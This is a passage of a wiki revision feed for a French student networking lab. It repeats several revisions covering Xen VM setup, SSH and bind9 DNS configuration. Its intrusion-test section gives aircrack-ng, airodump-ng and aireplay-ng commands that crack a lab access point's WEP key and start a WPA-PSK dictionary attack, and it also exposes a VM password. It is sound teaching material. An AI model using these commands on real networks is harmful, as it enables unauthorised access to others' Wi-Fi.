 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56991</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56991"/>
				<updated>2021-12-13T15:23:48Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Configuration de bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; IN {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56989</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56989"/>
				<updated>2021-12-13T15:16:06Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Configuration de bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; IN {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56986</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56986"/>
				<updated>2021-12-13T15:15:05Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* DNS Primaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
